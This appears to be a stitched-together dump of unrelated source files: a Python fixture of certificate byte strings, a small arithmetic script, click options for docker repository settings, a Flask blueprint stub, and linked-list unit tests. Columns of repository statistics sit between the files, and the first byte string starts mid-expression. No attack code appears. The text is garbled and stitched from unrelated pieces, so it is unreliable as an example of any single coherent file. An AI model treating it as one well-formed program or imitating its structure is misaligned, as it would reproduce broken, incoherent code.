b"\x9d\x05\xf7\x70\xd5\xb4\xf3\x92\x68\xc1\xf3\x31\x45\xbf\x7b\x18\x83\x82\xdb\x7c\xac\xd2\x62\x1d\x89\x35\xbd\x64\xfd\xb5\x81\x25" + \
b"\x35\x16\x07\x9c\x48\x3b\xa1\x3c\xff\xa9\x6b\x95\x94\xa8\x12\x3a\x92\xdf\x24\xc1\xef\xc5\x0b\xee\x7e\xc1\x98\x02\xf9\xbb\xd5\x42" + \
b"\xe8\x9b\xf0\xe2\xcf\x4d\x1e\xa2\x6b\x62\x08\x1e\x62\xcc\x46\xee\x77\xf1\x35\xce\x81\x0f\x07\x62\x69\x04\x41\xef\x92\x17\xc3\x01" + \
b"\x64\xba\xd8\x07\xfa\xe8\x8a\x08\x21\x05\xf8\xa0\x6e\x87\xd3\xc0\xdf\x05\xfa\x4d\x9c\x3f\xce\xc3\x7a\xd8\xb2\xcd\x29\x31\x02\x81" + \
b"\x80\x59\x7c\x94\xf2\x28\x9c\x8c\x24\x1c\xc3\x84\xac\xf6\x49\xf6\xc7\xb1\x98\x66\xf5\x6c\x59\x31\xe5\x30\xb2\xc1\xc0\xcc\x15\x94" + \
b"\x4d\x5a\xa0\x5c\xcb\x30\x46\xaa\xdc\x25\x60\xe2\x64\x5f\x1e\x35\xc3\x82\x3c\x47\x06\xc7\x4f\x39\xcc\x4f\xda\xf7\xf5\x28\x30\xde" + \
b"\x9a\xa3\xb9\xf6\xa4\x4a\x43\xff\x9e\x1a\x01\xcb\x03\x51\x37\xd4\xb8\xea\xab\xd5\xb6\x36\xf9\x76\x1e\x08\x9e\xcd\x58\x71\x8b\x6d" + \
b"\xa6\xf4\x43\xa3\x63\xf8\xd5\x72\xc1\x4b\x76\x78\x03\x15\x8d\xbf\xb3\x1f\x63\x3f\x99\xec\xfb\xd1\x5d\x09\x1d\xa6\xe6\xd0\xc6\x3c" + \
b"\xf9"
# Expected-value test fixture: list of three certificate blobs (the "3certs"
# of the module name). Each begins with a DER SEQUENCE — presumably X.509
# certificates sharing the same public key; confirm against the consuming test.
certs = [b"\x30\x82\x02\xb5\x30\x82\x01\x9d\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x31\x30" + \
b"\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x31\x30" + \
b"\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + \
b"\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1" + \
b"\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12" + \
b"\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17" + \
b"\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc" + \
b"\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38" + \
b"\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf" + \
b"\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21" + \
b"\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55" + \
b"\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x19\x9d\xca\x8f\x2b\x4a\xfd" + \
b"\xb6\x30\x4c\x1a\x45\xe1\x8a\x30\x72\x5e\xf3\xb4\x3c\x81\xf7\x00\xd2\x72\x44\x65\x49\x78\x3a\x62\xc9\x5d\xad\xb7\x39\x6c\x40\x50" + \
b"\x85\xd3\xc9\x0e\x69\x7a\xcc\x3e\x12\x68\x7e\x84\xe2\xcd\x33\xb7\x08\xf0\x6e\xda\x7f\xfb\x40\x96\xd1\x5f\x1f\x6e\x42\xa5\x42\xd2" + \
b"\xf5\x45\x27\x6f\xcc\x3a\x49\xc6\x61\xf0\xd7\x22\x0e\x2e\xc3\xb7\x77\xbf\xc7\x35\x63\x47\x6e\x80\x4a\x5a\x0b\xd1\x7e\xb5\xd3\x2a" + \
b"\x1d\xdf\x34\x72\xbd\x36\x01\x0b\x07\xe5\xcf\xef\x4c\x3d\xba\xe8\x5d\x74\x62\xe7\xd4\xb7\x76\xfd\xc8\x1e\x04\x0c\x0d\x0c\xdf\x0e" + \
b"\xbe\x72\x8f\x1c\xa0\xfa\x88\x23\x2c\xed\x86\x3b\xd0\xb3\x67\x62\x84\x2a\x23\xe5\x05\xbf\xd1\x95\xd7\xac\x82\xd9\x02\x51\x61\xa3" + \
b"\x10\xc7\xb1\x52\xbc\xe7\xa9\xc2\xf7\x8c\x82\x26\xcd\xf2\x76\x48\x2e\xa0\xfa\xd3\x8d\xe5\x19\xd9\x55\x73\x4e\x1a\x96\xb4\x86\x75" + \
b"\x8e\xda\xaa\x69\xd0\x15\x7c\x42\x9c\x8e\xeb\x9c\x94\xa0\xf6\x74\xbd\x3a\x9b\xda\x9a\x34\xef\xfe\xd6\x2b\x74\x43\x61\xc2\xd0\xf5" + \
b"\xb5\x2f\x51\x9d\xcb\xb9\x04\x6b\x21\x81\x01\x24\xfb\xf1\xbe\x1a\x14\xf0\x68\xdf\x4a\x31\x2f\x91\x2e",
b"\x30\x82\x02\xb5\x30\x82\x01\x9d\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x32\x30" + \
b"\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x32\x30" + \
b"\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + \
b"\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1" + \
b"\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12" + \
b"\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17" + \
b"\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc" + \
b"\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38" + \
b"\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf" + \
b"\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21" + \
b"\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55" + \
b"\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x6b\xe1\x9a\x78\x2f\x13\x79" + \
b"\xa7\xbb\xf4\xb3\x2b\x6a\x99\x1b\xfb\x99\xeb\xce\xd4\x36\x7f\x1e\xe5\x3f\xcd\x4d\xaf\xe7\x2d\xa3\x81\x5b\x5c\xf5\x86\x71\x3d\x80" + \
b"\x81\x26\xdb\x78\x18\x5b\xd8\x97\x4c\x9d\xa4\xa2\xf7\xb8\xce\xb9\x00\x29\xba\x30\xa0\x5c\xff\xed\x68\xcb\xd1\x10\x22\xc0\x1a\xd4" + \
b"\x80\x9c\x3c\xb2\xd5\x41\xad\x75\x6a\x21\x6e\x77\xd7\x49\x65\xa2\x0b\x47\xfe\x92\xf5\x26\x2a\xea\x59\xe3\xa6\xcc\x1d\xdd\x9c\x09" + \
b"\x23\xfa\xa9\x99\x59\xf4\xda\x49\x1f\xd3\x11\xea\xff\x36\xef\xe5\xcb\x5a\xb4\xa7\x2b\x57\x07\x00\xeb\x1b\x64\x9c\x2f\xa5\x47\x0f" + \
b"\x33\x6d\x7f\x42\x87\xe1\x25\x19\x31\xd7\x08\x55\x82\xe9\xfa\x8c\x6d\xda\x4e\x72\x78\xbe\xe1\x68\x32\x08\xf1\x7f\xb4\x4d\xa0\xd8" + \
b"\xd6\x4f\xad\x61\x01\x83\xf4\xb3\xef\xae\xc2\x86\xee\xd6\xca\x5f\x5b\x8b\x6b\x5a\x13\x98\x6c\x23\xff\x17\x53\x5f\x43\x31\x9e\xf7" + \
b"\x6d\xfd\x0a\x5b\xce\x25\x85\xe4\xc2\x49\x99\x09\x38\x98\xe0\x68\x88\xb8\x2d\xb8\x78\xc7\xbd\x3b\x33\x1e\xdf\x3f\xd8\xae\xfa\x8b" + \
b"\x1d\x4d\xb8\x95\x2f\x2f\x9f\x47\x1c\xbd\xa5\x2c\x74\x40\xc3\x62\x76\x1e\x99\xe5\xd9\x84\x62\x1c\x9c",
b"\x30\x82\x02\xb5\x30\x82\x01\x9d\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x33\x30" + \
b"\x1e\x17\x0d\x31\x36\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x17\x0d\x31\x38\x30\x35\x31\x35\x31\x38\x35\x38\x30\x34\x5a\x30" + \
b"\x1e\x31\x10\x30\x0e\x06\x03\x55\x04\x03\x0c\x07\x52\x53\x41\x32\x30\x34\x38\x31\x0a\x30\x08\x06\x03\x55\x04\x0a\x0c\x01\x33\x30" + \
b"\x82\x01\x22\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x00\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + \
b"\xc0\x86\x99\x9a\x76\x74\x9a\xf5\x04\xb8\x48\xf0\x7e\x67\xc3\x90\x51\x17\xe6\xcd\xb3\x97\x6b\x41\xbc\x4e\x4e\x0c\x30\xff\x57\xf1" + \
b"\x47\x99\xd5\xc3\x2a\x67\x26\x6c\x28\x1e\x18\x03\x0f\xaf\xd2\x70\xd2\xb2\xab\xae\x44\x7a\x1c\xcd\xce\x6f\xcb\xfb\x56\x96\x1b\x12" + \
b"\x52\x11\x43\x01\x26\x07\x4c\xf9\x3e\x51\x6b\xd3\x9a\x7d\xd8\x26\x92\xa1\xab\x5a\x6e\x2f\x66\x61\x31\x62\x23\x0f\x8b\x0a\x6a\x17" + \
b"\xe7\xd0\x0a\xc1\x69\x8a\x60\xcf\xba\x6c\x30\x33\x88\x2c\xaf\x13\x9a\xa6\x49\x83\x74\xb4\xdf\x23\xad\xe4\x01\x21\x52\x51\xfe\xcc" + \
b"\x4f\x4e\x3e\xd1\xa8\xce\x92\xc0\x34\x0e\x1d\x6c\xa7\x4d\x6f\x7d\xd7\x65\xb8\xf4\x50\xa1\x58\xa6\x8a\xae\x9e\x21\x50\x84\x01\x38" + \
b"\x1d\x85\x6e\xcb\x7d\xc9\xb5\x6b\xda\x94\xe5\x1c\xa8\xf5\x15\x5e\x8f\xbc\x95\xe0\x76\xcb\x0d\x7e\x79\x11\x0c\x81\xd2\x60\xf1\xaf" + \
b"\x84\xcc\xa0\x3b\x06\xe8\xa2\x42\x9f\xb3\xd4\x94\x8e\xd0\xbc\xe8\x7e\xfa\x01\x6b\x0d\xd0\x16\x60\x47\x86\x9c\xb9\x7f\x12\xd9\x21" + \
b"\x5c\xf7\x8e\x35\x7e\x85\x18\xfa\xc8\x86\xed\xbe\xb3\x0e\x4a\x56\xd7\xd6\x92\x3d\x23\x3c\xbc\xcc\xef\x3a\x33\xd8\x48\xd8\xca\x55" + \
b"\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x64\xd9\x2e\x77\xcb\xb8\x6c" + \
b"\xad\xf0\x99\x8b\x02\xfd\x11\xf4\x1b\x82\xfe\x44\xcf\x06\x76\xe0\xb5\xd7\xd1\xa9\xc0\xeb\xd6\x9f\x8e\xfc\x51\x1c\x51\xb4\x83\xc7" + \
b"\xf0\x3b\x7c\xc9\xde\x0b\x4a\x06\xf3\xdd\xe1\xcb\xd3\x65\xf3\x2a\xdb\x25\x9c\x09\xdd\xce\xd8\x2c\x76\x92\x0a\x3b\x39\x37\x23\x23" + \
b"\xe1\x44\x7c\x10\x2c\xe5\x67\x69\xf2\x85\x7f\x1d\xa4\xd3\xac\x5b\x14\x43\x2d\xff\xe2\x48\xe0\xce\x4c\x00\x02\xb7\xcf\xa1\xe5\xe6" + \
b"\x53\x06\x15\x50\x4a\xd9\x77\xe3\x4e\x8d\x78\x88\xea\x60\x9b\x15\xa8\x2d\x95\xdf\x01\x71\x38\xf8\xeb\x48\x65\xe0\x5f\x46\x55\x24" + \
b"\xd4\xea\xa0\xfb\xbd\x59\x68\x1d\x14\x38\xc6\x46\x69\x2d\x2a\xd5\xfa\xed\xf9\x0e\xe7\xaf\x6d\xf1\x25\x8b\x3c\x97\x0e\xeb\x6e\x28" + \
b"\x46\x11\x54\x7e\x49\xfa\x14\x26\xeb\x2a\x86\x62\x79\x4d\x13\x1b\x20\x4f\x67\x43\xfb\x03\xcd\x30\x70\x02\xfb\x5c\x67\xe9\x93\x4c" + \
b"\xd3\x07\xf5\x5c\x03\x46\xc6\x7b\xe6\x47\x1b\xc1\x55\xcb\xda\x13\x41\x9f\xd3\x85\x7c\x99\xf5\xea\x30\x0e\xf5\x36\x7a\xa5\x97\x00" + \
b"\x7d\x8f\xc4\xb3\xae\xad\x99\xbd\x13\x52\xde\x5b\x07\xa4\x54\xe9\x48\x3b\x2c\xe6\x4b\xae\x79\xfb\x72"]
| 144.993506
| 153
| 0.652649
| 4,954
| 22,329
| 2.940856
| 0.052887
| 0.010708
| 0.007413
| 0.009884
| 0.83156
| 0.83156
| 0.754067
| 0.754067
| 0.754067
| 0.754067
| 0
| 0.319315
| 0.105468
| 22,329
| 153
| 154
| 145.941176
| 0.410083
| 0
| 0
| 0.248366
| 0
| 0.980392
| 0.858614
| 0.858435
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
2475732e2a87ac11704ba2758df551c5ba82b68a
| 64
|
py
|
Python
|
Python/1. Introduction/03 - Arithmetic Operators.py
|
rosiejh/HackerRank
|
bfb07b8add04d3f3b67a61754db483f88a79e5a5
|
[
"Apache-2.0"
] | null | null | null |
Python/1. Introduction/03 - Arithmetic Operators.py
|
rosiejh/HackerRank
|
bfb07b8add04d3f3b67a61754db483f88a79e5a5
|
[
"Apache-2.0"
] | null | null | null |
Python/1. Introduction/03 - Arithmetic Operators.py
|
rosiejh/HackerRank
|
bfb07b8add04d3f3b67a61754db483f88a79e5a5
|
[
"Apache-2.0"
] | null | null | null |
# Read two integers (one per line) from stdin and print their sum,
# difference, and product, each on its own line.
first = int(input())
second = int(input())
results = (first + second, first - second, first * second)
print("\n".join(str(value) for value in results))
| 32
| 33
| 0.515625
| 15
| 64
| 2.2
| 0.466667
| 0.242424
| 0.181818
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 64
| 2
| 34
| 32
| 0.589286
| 0
| 0
| 0
| 0
| 0
| 0.030769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
24bcbe1dcf936db362fb7408a9568d35cc6c7f87
| 3,049
|
py
|
Python
|
src/cli/options/docker_repository_options.py
|
SimonDudanski/integration-test-docker-environment
|
3ea81172248f770596d81ff378772677ab5656ea
|
[
"MIT"
] | 4
|
2020-06-25T20:47:31.000Z
|
2021-09-10T15:22:51.000Z
|
src/cli/options/docker_repository_options.py
|
SimonDudanski/integration-test-docker-environment
|
3ea81172248f770596d81ff378772677ab5656ea
|
[
"MIT"
] | 113
|
2020-06-02T08:51:08.000Z
|
2022-03-31T08:47:41.000Z
|
src/cli/options/docker_repository_options.py
|
SimonDudanski/integration-test-docker-environment
|
3ea81172248f770596d81ff378772677ab5656ea
|
[
"MIT"
] | 2
|
2020-05-19T10:57:47.000Z
|
2020-06-22T13:32:20.000Z
|
import click
# Reusable click options for commands that pull cached stages from a
# *source* docker repository and push built images to a *target* one.
docker_repository_options = [
    click.option(
        '--source-docker-repository-name',
        type=str,
        default="exasol/script-language-container",
        show_default=True,
        help="Name of the docker repository for pulling cached stages. "
             "The repository name may contain the URL of the docker registry, "
             "the username and the actual repository name. "
             "A common structure is <docker-registry-url>/<username>/<repository-name>"),
    click.option(
        '--source-docker-tag-prefix',
        type=str,
        default="",
        show_default=True,
        help="Prefix for the tags which are used for pulling of cached stages"),
    click.option(
        '--source-docker-username',
        type=str,
        help="Username for the docker registry from where the system pulls cached stages.",
        required=False),
    click.option(
        '--source-docker-password',
        type=str,
        help="Password for the docker registry from where the system pulls cached stages. "
             "Without password option the system prompts for the password."),
    click.option(
        '--target-docker-repository-name',
        type=str,
        default="exasol/script-language-container",
        show_default=True,
        help="Name of the docker repository for naming and pushing images of stages. "
             "The repository name may contain the URL of the docker registry, "
             "the username and the actual repository name. "
             "A common structure is <docker-registry-url>/<username>/<repository-name>"),
    click.option(
        '--target-docker-tag-prefix',
        type=str,
        default="",
        show_default=True,
        help="Prefix for the tags which are used for naming and pushing of stages"),
    click.option(
        '--target-docker-username',
        type=str,
        help="Username for the docker registry where the system pushes images of stages.",
        required=False),
    click.option(
        '--target-docker-password',
        type=str,
        help="Password for the docker registry where the system pushes images of stages. "
             "Without password option the system prompts for the password."),
]
# Reduced option set for commands that only need a single repository
# (naming images), without the source/target split.
simple_docker_repository_options = [
    click.option(
        '--docker-repository-name',
        type=str,
        default="exasol/script-language-container",
        show_default=True,
        help="Name of the docker repository for naming images. "
             "The repository name may contain the URL of the docker registry, "
             "the username and the actual repository name. "
             "A common structure is <docker-registry-url>/<username>/<repository-name>"),
    click.option(
        '--docker-tag-prefix',
        type=str,
        default="",
        show_default=True,
        help="Prefix for the tags of the images"),
]
| 57.528302
| 100
| 0.595933
| 344
| 3,049
| 5.25
| 0.162791
| 0.093023
| 0.065891
| 0.063123
| 0.894241
| 0.830011
| 0.830011
| 0.830011
| 0.830011
| 0.830011
| 0
| 0
| 0.309282
| 3,049
| 52
| 101
| 58.634615
| 0.85755
| 0
| 0
| 0.5
| 0
| 0
| 0.541817
| 0.157429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.12
| 0.02
| 0
| 0.02
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7009e1e9467c6a8e146408a6c67960d19e4dfc62
| 46
|
py
|
Python
|
tutorial4.py
|
camelCasedAdi/Python-Programming-Tutorials
|
65aa7092a90b3c0cad7b35584714570231305d37
|
[
"MIT"
] | null | null | null |
tutorial4.py
|
camelCasedAdi/Python-Programming-Tutorials
|
65aa7092a90b3c0cad7b35584714570231305d37
|
[
"MIT"
] | null | null | null |
tutorial4.py
|
camelCasedAdi/Python-Programming-Tutorials
|
65aa7092a90b3c0cad7b35584714570231305d37
|
[
"MIT"
] | null | null | null |
# Tutorial: comparison operators produce booleans.
# Prints False, False, True — one result per line, same as the original
# three separate print statements.
for comparison_result in (15 != 15, 10 > 11, 10 > 9):
    print(comparison_result)
| 9.2
| 15
| 0.565217
| 9
| 46
| 2.888889
| 0.555556
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.305556
| 0.217391
| 46
| 5
| 16
| 9.2
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
7072c54759066c86ec241bb3f367a970099e43c9
| 111
|
py
|
Python
|
backend/ui-fulfillment/fulfillment_service/utils/tests.py
|
m0ps/gcp-fsi-design-pattern-ipre
|
391fc03c70bd7e2fb38605980d25e32ede6c7d27
|
[
"Apache-2.0"
] | 7
|
2021-06-23T08:09:42.000Z
|
2022-01-16T05:17:07.000Z
|
backend/ui-fulfillment/fulfillment_service/utils/tests.py
|
skylinepro/gcp-fsi-design-pattern-ipre
|
7a933e742b29a4b1b9acde2c2a03ff29bf61e600
|
[
"Apache-2.0"
] | null | null | null |
backend/ui-fulfillment/fulfillment_service/utils/tests.py
|
skylinepro/gcp-fsi-design-pattern-ipre
|
7a933e742b29a4b1b9acde2c2a03ff29bf61e600
|
[
"Apache-2.0"
] | 3
|
2021-06-29T12:53:09.000Z
|
2021-12-14T01:34:50.000Z
|
def lists_equal(left, right, sort_by=None):
return sorted(left, key=sort_by) == sorted(right, key=sort_by)
| 37
| 66
| 0.72973
| 19
| 111
| 4.052632
| 0.578947
| 0.233766
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126126
| 111
| 2
| 67
| 55.5
| 0.793814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
56457c59734ae192bc859356095eadb6d1420e25
| 90
|
py
|
Python
|
rman/app/routes/api_0_0/rm_task/__init__.py
|
RockFeng0/rtsf-manager
|
e11458364ca004a7fdee8be801ada72ec3ac3ce2
|
[
"MIT"
] | null | null | null |
rman/app/routes/api_0_0/rm_task/__init__.py
|
RockFeng0/rtsf-manager
|
e11458364ca004a7fdee8be801ada72ec3ac3ce2
|
[
"MIT"
] | null | null | null |
rman/app/routes/api_0_0/rm_task/__init__.py
|
RockFeng0/rtsf-manager
|
e11458364ca004a7fdee8be801ada72ec3ac3ce2
|
[
"MIT"
] | 1
|
2019-04-14T03:02:38.000Z
|
2019-04-14T03:02:38.000Z
|
from flask import Blueprint
rm_task = Blueprint('rm_task', __name__)
from . import views
| 18
| 40
| 0.777778
| 13
| 90
| 4.923077
| 0.615385
| 0.34375
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144444
| 90
| 4
| 41
| 22.5
| 0.831169
| 0
| 0
| 0
| 0
| 0
| 0.077778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
566f718ed13ef2ed3fa8587c240a2bce03b5b31f
| 2,186
|
py
|
Python
|
tests/test_q0203.py
|
mirzadm/ctci-5th-py
|
ba2f4de0aba4c7c04d7e0ddf3120ce312d9e5d66
|
[
"MIT"
] | null | null | null |
tests/test_q0203.py
|
mirzadm/ctci-5th-py
|
ba2f4de0aba4c7c04d7e0ddf3120ce312d9e5d66
|
[
"MIT"
] | 1
|
2018-07-04T23:10:20.000Z
|
2018-07-04T23:10:20.000Z
|
tests/test_q0203.py
|
mirzadm/ctci-5th-py
|
ba2f4de0aba4c7c04d7e0ddf3120ce312d9e5d66
|
[
"MIT"
] | null | null | null |
"""Unit tests for q0203.py."""
import unittest
from src.utils.linkedlist import LinkedList
from src.q0203 import del_intermediate_node
class TestDelIntermediateNode(unittest.TestCase):
"""Tests for del_intermediate_node."""
def test_del_intermediate_node(self):
self.assertFalse(del_intermediate_node(None))
linked_list = LinkedList()
n = linked_list.head
self.assertFalse(del_intermediate_node(n))
linked_list = LinkedList()
linked_list.insert_at_head(3)
self.assertEqual(linked_list.convert_to_list(), [3])
n = linked_list.head
self.assertFalse(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [3])
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
self.assertEqual(linked_list.convert_to_list(), [2, 3])
n = linked_list.head
self.assertTrue(del_intermediate_node(n))
self.assertEqual(linked_list.convert_to_list(), [3])
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
linked_list.insert_at_head(1)
self.assertEqual(linked_list.convert_to_list(), [1, 2, 3])
n = linked_list.head.next_node.next_node
self.assertFalse(del_intermediate_node(n))
self.assertTrue(linked_list.convert_to_list())
linked_list = LinkedList()
linked_list.insert_at_head(3)
linked_list.insert_at_head(2)
linked_list.insert_at_head(1)
self.assertEqual(linked_list.convert_to_list(), [1, 2, 3])
n = linked_list.head.next_node
self.assertTrue(del_intermediate_node(n))
